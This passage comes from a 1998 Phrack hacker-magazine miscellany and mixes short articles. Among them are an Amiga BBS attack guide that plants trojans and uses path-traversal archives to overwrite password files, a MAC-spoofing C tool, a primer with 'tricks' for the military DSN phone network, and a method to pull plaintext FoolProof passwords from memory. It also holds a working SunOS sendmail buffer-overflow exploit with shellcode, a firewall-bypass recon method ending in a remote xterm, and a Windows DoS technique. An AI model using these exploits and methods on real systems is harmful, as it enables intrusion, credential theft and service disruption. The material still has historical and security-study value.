consequences happen. I'm sick of people who cannot contribute intelligently to a conversation. So here are some tips for the future: You're a lot more impressive if you say something right than if you say something wrong. Someone nearby may be able to verify your claim and may call you on it. You're a lot more impressive if you can do something effortlessly because you've done it before than if you bumble and stumble through an experience because you thought you could do it and were wrong. If you're caught in a lie, admit it. The people who caught you already know more than you do: If you continue to spout bullshit, they'll know that too. But do your homework. Don't let them catch you being an idiot twice. If you do something illegal, don't broadcast it. This is especially stupid. Chances are, someone will be looking for someone to blame soon. By announcing that you're responsible, you're inviting them to contact you. 0x2>------------------------------------------------------------------------- Portable BBS Hacking Extra tips for Amiga BBS systems ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ After reading Khelbin's article from Phrack 50 (article 03), it reminded me of the similar tricks I had learnt for Amiga BBS systems. So I decided to write a small article covering the Amiga specific things. As with Khelbin's article, the actual BBS software isn't particularly important since they mostly all work the same way in the respect of archivers. This trick can also be used on other users, but I'll cover that later in the article. Firstly, the Amiga supports patching. This means you can set up paths which point to the directories where your commands are held. The Amiga OS also automatically sets a path to the current directory. As far as I know, you can't stop it doing this, but you don't need to anyway, if you're smart. This firstly problem, relating to the patching of the current directory is more common than you might expect, since it's such a simple thing to overlook. What happens is this: The BBS receives a new file from you, and unarchives it to a temporary dir for whatever reason. It virus checks the files (or whatever) then it attempt to recompress the files. But, if your file contained an executable named the same as the BBS's archiver, it would call the one you uploaded, since the BBS would've CDed to the temp dir to rearchive the files. As you can imagine, you can use this to activate all sorts of trojans and viruses, as long as the virus checker doesn't recognize them. A good idea is to make sure your trojan calls the proper command as well, so the sysop doesn't notice immediately. The more observant sysops will have circumvented this problem by calling the archive with an absolute path, and/or using another method to rearchive the files, without having to CD into the temp dir. The second trick is very similar to Khelbin's method of hex-editing archives. The only difference is, on the Amiga, the backslash and slash are swapped. For example, you create a file containing a new password file for the BBS in question. > makedir temp/BBSData > copy MyBBSPasswords.dat temp/BBSData/userdata > lha -r a SomeFiles.lha temp For the makedir, make the "temp" dir name to be however long it needs to be when you overwrite the characters of it in the hex-editor. In this case, we need 4. Now, load the archive into a hex editor like FileMaster and find the string: "temp\BBSData\userdata" and change it to whatever you need, for example: "\\\\BBSData\userdata" which will unarchive 4 levels back from his temporary directory into the real BBSData dir. The only problem with this is that you need to know a little about the BBS's directory structure. But, if you intend to hack it, you should probably know that much anyway. You'll notice that within the archive, the slash and backslash are swapped. This is important to remember, since using the wrong one will mean your archive will fail to extract correctly. The article about this from Phrack 50 was for PCs, which use backslash for directory operations. The Amiga uses slash instead, but apart from that, the methods used in that article will work fine for Amiga archives. If you know the Sysop of the BBS has a program like UnixDirs installed, you can even use the ".." to get to the root dir. The only other way to do that is to use a ":", however, I am not sure if this works. I have a feeling LhA would barf. Luckily, since the Amiga isn't limited by 8.3 filename problems, you can traverse directories much easier than with the limit imposed on PC systems. The only real way the Sysop can fix this problem is by have his temp dir for unarchiving to be a device which has nothing important on it, like RAM:. That way, if the archive is extracted to RAM: and tries to step back 3 directories using "///", it'll still be in RAM: and won't screw with anything important. 0x3>------------------------------------------------------------------------- <++> EX/changemac.c /* * In P51-02 someone mentioned Ethernet spoofing. Here you go. * This tiny program can be used to trick some smart / switching hubs. * * AWL production: (General Public License v2) * * changemac version 1.0 (2.20.1998) * * changemac -- change MAC address of your ethernet card. * * changemac [-l] | [-d number ] [ -r | -a address ] * * -d number number of ethernet device, 0 for eth0, 1 for eth1 ... * if -d option is not specify default value is 0 (eth0) * * -h help for changemac command * * -a address address format is xx:xx:xx:xx:xx:xx * * -r set random MAC address for ethernet card * * -l list first three MAC bytes of known ethernet vendors * (this list is not compleet, anyone who know some more * information about MAC addresses can mail me) * * changemac does not change hardware address, it just change data in * structure of kernel driver for your card. Next boot on your computer will * read real MAC form your hardware. * * The changed MAC stays as long as your box is running, (or as long as next * successful changemac). * * It will not work if kernel is already using that ethernet device. In that * case you have to turn off that device (ifconfig eth0 down). * * I use changemac in /etc/rc.d/rc.inet1 (slackware, or redhat) just line * before ifconfig for ethernet device (/sbin/ifconfig eth0 ...) * * The author will be very pleased if you can learn something form this code. * * Updates of this code can be found on: * http://galeb.etf.bg.ac.yu/~azdaja/changemac.html * * Sugestions and comments can be sent to author: * Milos Prodanovic */ #include #include #include #include #include #include #include #include struct LIST { char name[50]; u_char mac[3]; }; /* * This list was obtainted from vyncke@csl.sni.be, created on 01.7.93. */ struct LIST vendors[] = { {"OS/9 Network ",'\x00','\x00','\x00'}, {"BBN ",'\x00','\x00','\x02'}, {"Cisco ",'\x00','\x00','\x0C'}, {"Fujitsu ",'\x00','\x00','\x0E'}, {"NeXT ",'\x00','\x00','\x0F'}, {"Sytek/Hughes LAN Systems ",'\x00','\x00','\x10'}, {"Tektronics ",'\x00','\x00','\x11'}, {"Datapoint ",'\x00','\x00','\x15'}, {"Webster ",'\x00','\x00','\x18'}, {"AMD ? ",'\x00','\x00','\x1A'}, {"Novell/Eagle Technology ",'\x00','\x00','\x1B'}, {"Cabletron ",'\x00','\x00','\x1D'}, {"Data Industrier AB ",'\x00','\x00','\x20'}, {"SC&C ",'\x00','\x00','\x21'}, {"Visual Technology ",'\x00','\x00','\x22'}, {"ABB ",'\x00','\x00','\x23'}, {"IMC ",'\x00','\x00','\x29'}, {"TRW ",'\x00','\x00','\x2A'}, {"Auspex ",'\x00','\x00','\x3C'}, {"ATT ",'\x00','\x00','\x3D'}, {"Castelle ",'\x00','\x00','\x44'}, {"Bunker Ramo ",'\x00','\x00','\x46'}, {"Apricot ",'\x00','\x00','\x49'}, {"APT ",'\x00','\x00','\x4B'}, {"Logicraft ",'\x00','\x00','\x4F'}, {"Hob Electronic ",'\x00','\x00','\x51'}, {"ODS ",'\x00','\x00','\x52'}, {"AT&T ",'\x00','\x00','\x55'}, {"SK/Xerox ",'\x00','\x00','\x5A'}, {"RCE ",'\x00','\x00','\x5D'}, {"IANA ",'\x00','\x00','\x5E'}, {"Gateway ",'\x00','\x00','\x61'}, {"Honeywell ",'\x00','\x00','\x62'}, {"Network General ",'\x00','\x00','\x65'}, {"Silicon Graphics ",'\x00','\x00','\x69'}, {"MIPS ",'\x00','\x00','\x6B'}, {"Madge ",'\x00','\x00','\x6F'}, {"Artisoft ",'\x00','\x00','\x6E'}, {"MIPS/Interphase ",'\x00','\x00','\x77'}, {"Labtam ",'\x00','\x00','\x78'}, {"Ardent ",'\x00','\x00','\x7A'}, {"Research Machines ",'\x00','\x00','\x7B'}, {"Cray Research/Harris ",'\x00','\x00','\x7D'}, {"Linotronic ",'\x00','\x00','\x7F'}, {"Dowty Network Services ",'\x00','\x00','\x80'}, {"Synoptics ",'\x00','\x00','\x81'}, {"Aquila ",'\x00','\x00','\x84'}, {"Gateway ",'\x00','\x00','\x86'}, {"Cayman Systems ",'\x00','\x00','\x89'}, {"Datahouse Information Systems ",'\x00','\x00','\x8A'}, {"Jupiter ? Solbourne ",'\x00','\x00','\x8E'}, {"Proteon ",'\x00','\x00','\x93'}, {"Asante ",'\x00','\x00','\x94'}, {"Sony/Tektronics ",'\x00','\x00','\x95'}, {"Epoch ",'\x00','\x00','\x97'}, {"CrossCom ",'\x00','\x00','\x98'}, {"Ameristar Technology ",'\x00','\x00','\x9F'}, {"Sanyo Electronics ",'\x00','\x00','\xA0'}, {"Wellfleet ",'\x00','\x00','\xA2'}, {"NAT ",'\x00','\x00','\xA3'}, {"Acorn ",'\x00','\x00','\xA4'}, {"Compatible Systems Corporation ",'\x00','\x00','\xA5'}, {"Network General ",'\x00','\x00','\xA6'}, {"NCD ",'\x00','\x00','\xA7'}, {"Stratus ",'\x00','\x00','\xA8'}, {"Network Systems ",'\x00','\x00','\xA9'}, {"Xerox ",'\x00','\x00','\xAA'}, {"Western Digital/SMC ",'\x00','\x00','\xC0'}, {"Eon Systems (HP) ",'\x00','\x00','\xC6'}, {"Altos ",'\x00','\x00','\xC8'}, {"Emulex ",'\x00','\x00','\xC9'}, {"Darthmouth College ",'\x00','\x00','\xD7'}, {"3Com ? Novell ? [PS/2] ",'\x00','\x00','\xD8'}, {"Gould ",'\x00','\x00','\xDD'}, {"Unigraph ",'\x00','\x00','\xDE'}, {"Acer Counterpoint ",'\x00','\x00','\xE2'}, {"Atlantec ",'\x00','\x00','\xEF'}, {"High Level Hardware (Orion, UK) ",'\x00','\x00','\xFD'}, {"BBN ",'\x00','\x01','\x02'}, {"Kabel ",'\x00','\x17','\x00'}, {"Xylogics, Inc.-Annex terminal servers",'\x00','\x08','\x2D'}, {"Frontier Software Development ",'\x00','\x08','\x8C'}, {"Intel ",'\x00','\xAA','\x00'}, {"Ungermann-Bass ",'\x00','\xDD','\x00'}, {"Ungermann-Bass ",'\x00','\xDD','\x01'}, {"MICOM/Interlan [Unibus, Qbus, Apollo]",'\x02','\x07','\x01'}, {"Satelcom MegaPac ",'\x02','\x60','\x86'}, {"3Com [IBM PC, Imagen, Valid, Cisco] ",'\x02','\x60','\x8C'}, {"CMC [Masscomp, SGI, Prime EXL] ",'\x02','\xCF','\x1F'}, {"3Com (ex Bridge) ",'\x08','\x00','\x02'}, {"Symbolics ",'\x08','\x00','\x05'}, {"Siemens Nixdorf ",'\x08','\x00','\x06'}, {"Apple ",'\x08','\x00','\x07'}, {"HP ",'\x08','\x00','\x09'}, {"Nestar Systems ",'\x08','\x00','\x0A'}, {"Unisys ",'\x08','\x00','\x0B'}, {"AT&T ",'\x08','\x00','\x10'}, {"Tektronics ",'\x08','\x00','\x11'}, {"Excelan ",'\x08','\x00','\x14'}, {"NSC ",'\x08','\x00','\x17'}, {"Data General ",'\x08','\x00','\x1A'}, {"Data General ",'\x08','\x00','\x1B'}, {"Apollo ",'\x08','\x00','\x1E'}, {"Sun ",'\x08','\x00','\x20'}, {"Norsk Data ",'\x08','\x00','\x26'}, {"DEC ",'\x08','\x00','\x2B'}, {"Bull ",'\x08','\x00','\x38'}, {"Spider ",'\x08','\x00','\x39'}, {"Sony ",'\x08','\x00','\x46'}, {"BICC ",'\x08','\x00','\x4E'}, {"IBM ",'\x08','\x00','\x5A'}, {"Silicon Graphics ",'\x08','\x00','\x69'}, {"Excelan ",'\x08','\x00','\x6E'}, {"Vitalink ",'\x08','\x00','\x7C'}, {"XIOS ",'\x08','\x00','\x80'}, {"Imagen ",'\x80','\x00','\x86'}, {"Xyplex ",'\x80','\x00','\x87'}, {"Kinetics ",'\x80','\x00','\x89'}, {"Pyramid ",'\x80','\x00','\x8B'}, {"Retix ",'\x80','\x00','\x90'}, {'\x0','\x0','\x0','\x0'} }; void change_MAC(u_char *,int); void list(); void random_mac(u_char *); void help(); void addr_scan(char *,u_char *); int main(int argc, char ** argv) { char c; u_char mac[6] = "\0\0\0\0\0\0"; int nr = 0,eth_num = 0,nr2 = 0; extern char *optarg; if (argc == 1) { printf("for help: changemac -h\n"); exit(1); } while ((c = getopt(argc, argv, "-la:rd:")) != EOF) { switch(c) { case 'l' : list(); exit(1); case 'r' : nr++; random_mac(mac); break; case 'a' : nr++; addr_scan(optarg,mac); break; case 'd' : nr2++; eth_num = atoi(optarg); break; default: help(); exit(1); } if (nr2 > 1 || nr > 1) { printf("too many options\n"); exit(1); } } change_MAC(mac,eth_num); return (0); } void change_MAC(u_char *p, int ether) { struct ifreq devea; int s, i; s = socket(AF_INET, SOCK_DGRAM, 0); if (s < 0) { perror("socket"); exit(1); } sprintf(devea.ifr_name, "eth%d", ether); if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) { perror(devea.ifr_name); exit(1); } printf("Current MAC is\t"); for (i = 0; i < 6; i++) { printf("%2.2x ", i[devea.ifr_hwaddr.sa_data] & 0xff); } printf("\n"); /* an ANSI C ?? --> just testing your compiler */ for(i = 0; i < 6; i++) i[devea.ifr_hwaddr.sa_data] = i[p]; printf("Changing MAC to\t"); /* right here i am showing how interesting is programing in C */ printf("%2.2x:%2.2x:%2.2x:%2.2x:%2.2x:%2.2x\n", 0[p], 1[p], 2[p], 3[p], 4[p], 5[p]); if (ioctl(s,SIOCSIFHWADDR,&devea) < 0) { printf("Unable to change MAC -- Is eth%d device is up?\n", ether); perror(devea.ifr_name); exit(1); } printf("MAC changed\n"); /* just to be sure ... */ if (ioctl(s, SIOCGIFHWADDR, &devea) < 0) { perror(devea.ifr_name); exit(1); } printf("Current MAC is: "); for (i = 0; i < 6; i++) printf("%X ", i[devea.ifr_hwaddr.sa_data] & 0xff); printf("\n"); close(s); } void list() { int i = 0; struct LIST *ptr; printf("\nNumber\t MAC addr \t vendor\n"); while (0[i[vendors].name]) { ptr = vendors + i; printf("%d\t=> %2.2x:%2.2x:%2.2x \t%s \n", i++, 0[ptr->mac], 1[ptr->mac], 2[ptr->mac], ptr->name); if (!(i % 15)) { printf("\n press enter to continue\n"); getchar(); } } } void random_mac(u_char *p) { srandom(getpid()); 0[p] = random() % 256; 1[p] = random() % 256; 2[p] = random() % 256; 3[p] = random() % 256; 4[p] = random() % 256; 5[p] = random() % 256; } void addr_scan(char *arg, u_char *mac) { int i; if (!(2[arg] == ':' && 5[arg] == ':' && 8[arg] == ':' && 11[arg] == ':' && 14[arg] == ':' && strlen(arg) == 17 )) { printf("address is not in spacified format\n"); exit(0); } for(i = 0; i < 6; i++) i[mac] = (char)(strtoul(arg + i*3, 0, 16) & 0xff); } void help() { printf(" changemac - soft change MAC address of your ethernet card \n"); printf(" changemac -l | [-d number ] [ -r | -a address ] \n"); printf(" before you try to use it just turn ethernet card off, ifconfig ethX down\n"); printf(" -d number number of ethernet device \n"); printf(" -h this help \n"); printf(" -a address address format is xx:xx:xx:xx:xx:xx \n"); printf(" -r set random generated address \n"); printf(" -l list first three MAC bytes of known ethernet vendors\n"); printf(" example: changemac -d 1 -a 12:34:56:78:9a:bc\n"); } /* EOF */ <--> 0x4>------------------------------------------------------------------------- The Defense Switched Network By: DataStorm This is an extremely shortened tutorial on the DSN. More information is available through the DoD themselves and various places on the Internet. If you have any comments or suggestions, feel free to e-mail me. ***THE BASICS OF THE DSN*** Despite popular belief, the AUTOVON is gone, and a new DCS communication standard is in place, the DSN, or Defense Switched Network. The DSN is used for the communication of data and voice between various DoD installations in six world theaters: Canada, the Caribbean, the Continental United States (CONUS), Europe, the Pacific and Alaska, and Southwest Asia. The DSN is used for everything from video-teleconferencing, secure and insecure data and voice, and any other form of communication that can be transmitted over wiring. It is made up of the old AUTOVON system, the European telephone system, the Japanese and Korean telephone upgrades, the Oahu system, the DCTN, the DRSN, the Video Teleconferencing Network, and more. This makes the DSN incredibly large, which in turn makes it very useful. (See the section TRICKS in this article for more information.) The DSN is extremely isolated. It is designed to function even when outside communication lines have been destroyed and is not dependent on any outside equipment. It uses its own switching equipment, lines, phones, and other components. It has very little link to the outside world, since in a bombing/war, civilian telephone may be destroyed. This aspect, of course, also means that all regulation of the DSN is done by the government itself. When you enter the DSN network, you are messing with the big boys. To place a call to someone in the DSN, you must first dial the DSN access number, which lets you into the network itself. From there you can dial any number within the DSN, as long as it is not restricted from your calling area or hone. (Numbers both inside and outside the DSN can be restricted from calling certain numbers). If you are part of the DSN, you may periodically get a call from an operator, wanting to connect you with another person in or out of the network. To accept, you must tell her your name and local base telephone extension, your precedence, and any other information the operator feels she must have from you at that time. (I'm not sure of the operators abilities or technologies. They may have ANI in all or some areas.) The DSN uses signaling techniques similar to Bell, with a few differences. The dial tone is the same on both networks; the network is open and ready. When you call or are being called, a DSN phone will ring just like a Bell phone, with one difference. If the phone rings at a fairly normal rate, the call is of average precedence, or "Routine." If the ringing is fast, it is of higher precedence and importance. A busy signal indicates that the line is either busy, or DSN equipment is busy. Occasionally you may hear a tone called the "preempt" tone, which indicates that your call was booted off because one of higher precedence needed the line you were connected with. If you pick up the phone and hear an odd fluctuating tone, this means that a conference call is being conducted and you are to be included. As on many other large networks, the DSN uses different user classes to distinguish who is better than who, who gets precedence and more calls and who does not. The most powerful user class is the "Special C2" user. This fortunate military employee (or hacker?) has virtually unrestricted access to the system. The Special C2 user identifies himself as that through a validation process. The next class of user is the regular "C2" user. To qualify, you must have the requirements for C2 communications, but do not have to meet the requirements for the Special C2 user advantages. (These are users who coordinate military operations, forces, and important orders.) The last type of user is insensitively called the "Other User." This user has no need for Specail C2 or C2 communications, so he is not given them. A good comparison would be "root" for Special C2, "bin" for C2, and "guest" for other. The network is fairly secure and technologically advanced. Secure voice is encrypted with the STU-III. This is the third generation in a line of devices used to make encrypted voice, which is NOT considered data over the DSN. Networking through the DSN is done with regular IP version 4, unless classified, in which case Secret IP Routing Network(SIPRNET) protocol is used. Teleconferencing can be set up by the installation operator, and video teleconferencing is a common occurrence. The DSN is better than the old AUTOVON system in speed and quality, which allows it to take more advantage of these technologies. I'm sure that as we progress into faster transmission rates and higher technology, we will begin to see the DSN use more and more of what we see the good guys using on television. Precedence on the DSN fits the standard NCS requirements, so I will not talk about it in great detail in this article. All I think I have to clear up is that DSN phones do NOT use A, B, C, and D buttons as the phones in the AUTOVON did for precedence. Precedence is done completely with standard DTMF for efficiency. A DSN telephone directory is not distributed to the outside, mainly because of the cost and lack of interest. However, I have listed the NPA's for the different theaters. Notice that the DSN only covers major ally areas. You won't be able to connect to Russia with this system, sorry. Keep in mind that each base has their own operator, who for the intra-DSN circuit, is reachable by dialing "0." Here is a word of advice: there ARE people who sit around all day and monitor these lines. Further, you can be assured these are specialized teams that work special projects at the echelons above reality. This means that if you do something dumb on the DSN from a location they can trace back to you, you WILL be imprisoned. AREA DSN NPA Canada 312 CONUS 312 Caribbean 313 Europe 314 Pacific/Alaska 315/317 S.W. Asia 318 The format for a DSN number is NPA-XXX-YYYY, where XXX is the installation prefix (each installation has at least one of their own) and YYYY is the unique number assigned to each internal pair, which eventually leads to a phone. I'm not even going to bother with a list of numbers; there are just too many. Check http://www.tfs.net/~havok (my home page) for the official DSN directory and more information. DSN physical equipment is maintained and operated by a team of military specialists designed specifically for this task, (you won't see many Bell trucks around DSN areas). Through even my deepest research, I was unable to find any technical specifications on the hardware of the actual switch, although I suppose they run a commercial brand such as ESS 5. My resources were obscure in this area, to say the least. ***TRICKS*** Just like any other system in existence, the DSN has security holes and toys we all can have fun with. Here are a few. (If you find any more, drop me an e-mail.) * Operators are located on different pairs in each base; one can never tell before dialing exactly who is behind the other line. My best luck has been with XXX-0110 and XXX-0000. * To get their number in the DSN directory, DoD installations write to: HQ DISA, Code D322 11440 Isaac Newton Square Reston, VA 20190-5006 * Another interesting address: It seems that GTE Government Systems Corporation Information Systems Division 15000 Conference Center Drive Chantilly, VA 22021-3808 has quite a bit of involvement with the DSN and its documentation projects. ***IN CONCLUSION*** As the DSN grows, so does my fascination with the system. Watch for more articles about it. I would like to say a BIG thanks to someone who wishes to remain unknown, a special english teacher, and the DoD for making their information easy to get a hold of. 0x5>------------------------------------------------------------------------- Howdy, I have found a weakness in the password implementations of FoolProof. FoolProof is a software package used to secure workstations and LAN client machines from DoS and other lame-ass attacks by protecting system files (autoexec.bat, config.sys, system registry) and blocking access to specified commands and control panels. FoolProof was written by Smart Stuff software originally for the Macintosh but recently released for win3.x and win95. All my information pertains directly to versions 3.0 and 3.3 of both the 3.x and 95 versions but should be good for all early versions if they exist. I have spent some time playing with it. It is capable of modifying the boot sequence on win3.x machines to block the use of hot keys and prevent users from breaking out of autoexec. It also modifies the behavior of command.com so that commands can be verified by a database and anything deemed unnecessary or potentially malicious can be blocked (fdisk, format, dosshell?, dir, erase, del. defrag, chkdsk, defrag, undelete, debug, etc.). Its windows clients provide for a way to log into/out of FoolProof for privileged access by using a password or hot key assignment. The newer installation of 95 machines have a centralized configuration database that lives on our NetWare server. My first success with breaking FoolProof passwords came by using a hex editor to scan the windows swap file for anything that might be of interested. In the swap file I found the password in plain text. I was surprised but thought that it was something that would be simply unavoidable and unpredictable. Later though I used a memory editor on the machine (95 loves it when I do that) and found that FoolProof stores a copy of the user password IN PLAIN TEXT inside its TSR's memory space. To find a FoolProof password, simply search through conventional memory for the string "FOOLPROO" (I don't know what they did with that last "F") and the next 128 bytes or so should contain two plaintext passwords followed by the hot-key assignment. For some reason FoolProof keeps two passwords on the machine, the present one and a 'legacy' password (the one you used before you _thought_ it was changed). There exist a few memory viewers/editors but it isn't much effort to write something. Getting to a point where you can execute something can be difficult but isn't impossible. I found that it is more difficult to do this on the win3.x machines because FoolProof isn't compromised by the operating system it sits on top of; basically getting a dos prompt is up to you (try file manager if you can). 95 is easier because it is very simple to convince 95 that it should start up into Safe-Mode and then creating a shortcut in the StartUp group to your editor and then rebooting the machine (FoolProof doesn't get a chance to load in safe mode). I tried to talk to someone at SmartStuff but they don't seem to care what trouble their simple minded users might get into. They told me I must be wrong because they use 128 bit encryption on the disk. Apparently they don't even know how their own software works because the utility they provide to recover lost passwords requires some 32+ character master password that is hardwired into each installation. JohnWayne 0x6>------------------------------------------------------------------------- [ old skool dept. ] <++> EX/smrex.c /* * Overflow for Sunos 4.1 sendmail - execs /usr/etc/rpc.rexd. * If you don't know what to do from there, kill yourself. * Remote stack pointer is guessed, the offset from it to the code is 188. * * Use: smrex buffersize padding |nc hostname 25 * * where `padding` is a small integer, 1 works on my sparc 1+ * * I use smrex 84 1, play with the numbers and see what happens. The core * gets dumped in /var/spool/mqueue if you fuck up, fire up adb, hit $r and * see where your offsets went wrong :) * * I don't *think* this is the 8lgm syslog() overflow - see how many versions * of sendmail this has carried over into and let me know. Or don't, I * wouldn't :) * * P.S. I'm *sure* there are cleverer ways of doing this overflow. So sue * me, I'm new to this overflow business..in my day everyone ran YPSERV and * things were far simpler... :) * * The Army of the Twelve Monkeys in '98 - still free, still kicking arse. */ #include int main(int argc, char **argv) { long unsigned int large_string[10000]; int i, prelude; unsigned long offset; char padding[50]; offset = 188; /* Magic numbers */ prelude = atoi(argv[1]); if (argc < 2) { printf("Usage: %s bufsize | nc target 25\n", argv[0]); exit(1); } for (i = 6; i < (6 + atoi(argv[2])); i++) { strcat(padding, "A"); } for(i = 0; i < prelude; i++) { large_string[i] = 0xfffffff0; /* Illegal instruction */ } large_string[prelude] = 0xf7ffef50; /* Arbitrary overwrite of %fp */ large_string[prelude + 1] = 0xf7fff00c; /* Works for me; address of code */ for( i = (prelude + 2); i < (prelude + 64); i++) { large_string[i] = 0xa61cc013; /* Lots of sparc NOP's */ } /* Now the sparc execve /usr/etc/rpc.rexd code.. */ large_string[prelude + 64] = 0x250bcbc8; large_string[prelude + 65] = 0xa414af75; large_string[prelude + 66] = 0x271cdc88; large_string[prelude + 67] = 0xa614ef65; large_string[prelude + 68] = 0x291d18c8; large_string[prelude + 69] = 0xa8152f72; large_string[prelude + 70] = 0x2b1c18c8; large_string[prelude + 71] = 0xaa156e72; large_string[prelude + 72] = 0x2d195e19; large_string[prelude + 73] = 0x900b800e; large_string[prelude + 74] = 0x9203a014; large_string[prelude + 75] = 0x941ac00b; large_string[prelude + 76] = 0x9c03a104; large_string[prelude + 77] = 0xe43bbefc; large_string[prelude + 78] = 0xe83bbf04; large_string[prelude + 79] = 0xec23bf0c; large_string[prelude + 80] = 0xdc23bf10; large_string[prelude + 81] = 0xc023bf14; large_string[prelude + 82] = 0x8210203b; large_string[prelude + 83] = 0xaa103fff; large_string[prelude + 84] = 0x91d56001; large_string[prelude + 85] = 0xa61cc013; large_string[prelude + 86] = 0xa61cc013; large_string[prelude + 87] = 0xa61cc013; large_string[prelude + 88] = 0; /* And finally, the overflow..simple, huh? :) */ printf("helo\n"); printf("mail from: %s%s\n", padding, large_string); } <--> 0x7>------------------------------------------------------------------------- Practical Sendmail Routing Intro: This article will be short and sweet as the concept and methodology are quite simple. UUCP Style routing has been around longer than most newbie hackers, yet it is a foreign concept to them. In past years, Phrack has seen at least one article on using this method to route a piece of mail around the world and back to the base host. That article in Phrack 41 (Network Miscellany) by the Racketeer gave us a good outline as how to implement routed mail. I will recap that method and show a practical use for it. If you have any questions on the method for building the mail headers, read a book on UUCP or something. How to: In short, you want to create a custom route for a piece of email to follow. This single piece of mail will follow your desired path and go through machines of your choice. Even with mail relaying turned off, MTAs will still past this mail as it looks at the mail and delivers only one hope at a time. The customized headers basically tell sendmail that it should only be concerned about the next target in the path, and to deliver. In our example below, we will have nine systems to be concerned about. Your base host, seven systems to bounce through, and the user on the final destination machine. host1 = origin of mail. base host to send from. host2 = second... host3 = third... (etc) host4 host5 host6 host7 host8 = final hop in our chain (i.e.: second to last) user @ dest = final resting place for mail Most people will wonder "why route mail, sendmail will deliver directly". Consider the first step in doing a penetration of a foreign network: Recon. A would-be attacker needs as much information about a remote host as possible. Have you ever sent mail to a remote system with the intention of bouncing it? If not, try it. You will find it a quick and easy way of finding out what version of what MTA the host is running. Knowing that the message will bounce with that information, think larger. Send mail to multiple hosts on a subnet and it will return the version information for each machine it bounces through. Think larger. Firewalls are often set up to allow mail to go in and out without a problem. So route your mail past the firewall, bounce it among several internal systems, then route the mail right back out the front door. You are left with a single piece of mail containing information on each system it bounced through. Right off, you can start to assess if the machines are running Unix or not among other things. So, with the example above, your mail 'to' will look like this: host3!host4!host5!host6!host7!host8!dest!user@host2 I know. Very weird as far as the order and placement of each. If you don't think it looks right, go reference it. Goal: The desired outcome of this mail is to return with as much information about the remote network as possible. There are a few things to be wary of however. If the mail hits a system that doesn't know how to handle it, you may never see it again. Routing the mail through a hundred hosts behind a firewall is risky in that it may take a while to go through, and if it encounters problems you may not get word back to know where it messed up. What I recommend is sending one piece of mail per host on the subnet. This can be scripted out fairly easy, so let this be a lesson in scripting as well. Theoretical Route 1: you --. firewall --. internal host1 --. | internal host2 --' firewall --' you --' Theoretical Route 2: If the internal network is on a different IP scheme than the external machines, (ie: address translation) then your mail will fail at the first hop by the above means. So, we can try an alternative of passing mail to both sides of the firewall in order. Of course, this would rely on knowledge of internal network numbering. If you are wondering how to get this, two ways come to mind. If you are one of those wacky 'white hat' ethical hackers, this information is often given during a controlled penetration. If you are a malicious 'black hat' evil hacker, then trashing or Social Engineering might be an option. you --. firewall (external interface) --. firewall (internal interface) --. | .-- internal host1 --' | `-- internal host2 --. | firewall (internal interface) --' firewall (external interface) --' you --' Taking it to the next level: So if you find this works, what else can you do? Have a remote sendmail attack lying around? Can you run a command on a remote machine? Know what an xterm is? Firewalls often allow a wide variety of traffic to go outbound. So route a remote sendmail based attack to the internal host of your choice, spawn an xterm to your terminal and voila. You just bypassed a firewall! Conclusion: Yup. That is it. Short and sweet. No need to put excess words in this article as you are probably late on your hourly check of rootshell.com looking for the latest scripts. Expand your minds. Hi: mea_culpa mea_culpa@sekurity.org * "taking it to the next level" is a bastardized trademark of MC. * 'wacky white hat ethical hacker' is probably a trademark of IBM. * 'malicious black hat evil hacker' is a trademark of the ICSA. 0x8>------------------------------------------------------------------------- Resource Hacking and Windows NT/95 by Lord Byron With the release of Windows NT service pack 3 the infamous Winnuke denial of service attacks are rendered useless. At least that is what they lead you to believe. This is not the case. To understand why we need to delve into a little background on the internals of Windows; more specifcally, the way that Windows allocates memory. This is the undying problem. To better understand the problems with Windows memory allocation you have to go very deep within the operating system, to what is commonly called the "thunking layer". This layer is what allows Windows to call both 16 and 32-bit functions on the same function stack. If you make a TCP/IP-type function call or (if you are a database person) an ODBC function call you are calling a pseudo 32-bit function. Yes, both of these direct drivers are 32-bit drivers but they rely upon 16-bit code to finish their process. Once you enter one of these drivers all the data is passed into that driver. Windows also requires all drivers to run at the level 0 level within the Windows kernel. These drivers then pass off the data to different 16-bit functions. The difficulty with passing off 32-bit data to a 16-bit function is where the thunking layer comes into the picture. The thunking layer is a wrapper around all 16-bit functions in Windows that can be called by a 32-bit function. It thunks the data calls down to 16-bit by converting them into multiple data elements normally done by a structure or by passing the actual memory dump of the variable and passing the data dump into the function. Then the function does its processing to the data within the data-gram and passes it back out of the function. At this point it goes back through the thunking layer and reconverts the data back to a 32-bit variable and then the 32-bit driver keeps on with its processing. This processing of the thunking layer is not an unheard of scheme nor has it not been used before but with the way that we all know that Microsoft codes it was done in a hurry, not properly implemented, and never tested till production. Do to the aforementioned reasons it should not surprise to anyone that the code has severe memory leaks. This is why if you, for example, make an ODBC call to an Oracle database long enough that eventually your Windows box becomes slower until an eventual crash "Blue Screen of Death" or just becomes unbearable to work with. As Microsoft tries to patch these bugs in the device drivers it releases service packs such as SP3. The way that Microsoft has developed and implements the device driver process is on a modular code basis. So when a patch is implemented it actually calls the modulated code to handle the exact situation for that exploit. Now that you know some of the basic internals as to how Windows makes its calls it is time to understand resource hacking and the reason Win-nuke still works. If you ping a Windows box it allocates a certain amount of ram and runs code within the driver that returns the ICMP packet. Well if you ping a windows box 20,000 or 30,000 times it has to allocate 20 or 30 thousand chunks of memory to run the device driver to return the ICMP packet. Once 20 or 30 thousand little chunks of memory out there you do not have enough memory to run allow the TCP/IP driver to spawn the code to handle normal function within the Windows box. At this point if you were to run Win-nuke to send the OOB packet to port 139 on a Windows box in would crash the box. The OOB code that was used to patch Win-nuke in SP3 could not be spawned due to the lack of memory available and thus uses the original code for the TCP/IP.sys so it gets processed by the standard TCP/IP driver that was original shipped with Windows without the fix. The only way for Microsoft to actually fix this problem would be to rewrite the TCP/IP driver with the correct code within it as the core driver (instead of writing patches to be spawned when the exception occurs). In doing this though would require Microsoft a significant amount of coding skill and talent which we know that no self respecting coder would ever work for the big evil. 0x9>------------------------------------------------------------------------- ----[ PDM Phrack Doughnut Movie (PDM) last issue was `Grosse Point Blank`. PDM52 recipients: Jim Broome Jonathan Ham Jon "Boyracer" George James Hanson Jesse Paulsen jcoest All the recipients have J* first names. Eerie. And what is actually involved in `boyracing`? Do they put little saddles on them? PDM53 Challenge: "...Remember, ya always gotta put one in the brain. The first one puts him down, the second one finishes him off. Then he's dead. Then we go home." ----[ EOF ----[ Phrack Magazine Volume 8, Issue 53 July 8, 1998, article 04 of 15 -------------------------[ P H R A C K 5 